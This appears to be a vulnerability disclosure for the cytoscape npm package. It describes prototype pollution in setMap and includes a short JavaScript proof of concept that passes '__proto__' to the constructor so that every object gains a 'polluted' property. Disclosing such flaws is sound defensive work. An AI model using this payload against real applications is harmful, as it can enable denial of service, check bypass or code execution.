cytoscape

vulnerability prototype pollution
severity 7.3
language javascript
registry npm

✍️ Description

Cytoscape.js contains a graph theory model and an optional renderer to display interactive graphs. This library was designed to make it as easy as possible for programmers and scientists to use graph theory in their apps, whether it's for server-side analysis in a Node.js app or for a rich user interface.

The setMap is subject to prototype pollution due to the recursely copy obj[key] to obj in the code. This vulnerble API is exported to be called by the end users throgh cytoscape constructor. This vulnerability allows modification of the Object prototype. If an attacker can control part of the structure passed to this function, they could add or modify an existing property. Possibly leading to many kinds of attacks such as the denial-of-service, checking bypass, or potentially code execution.

🕵️‍♂️ Proof of Concept

// PoC.js
var cytoscape=require('cytoscape');
console.log('Before: ' + {}.polluted);//Before: undefined
cytoscape('__proto__','polluted','HACKED');
console.log('After: ' + {}.polluted); //After: HACKED

💥 Impact

This vulnerability is capable of polluting Object's prototypes and possibly leading to many kinds of attacks such as the denial-of-service, checking bypass, or potentially code execution.

References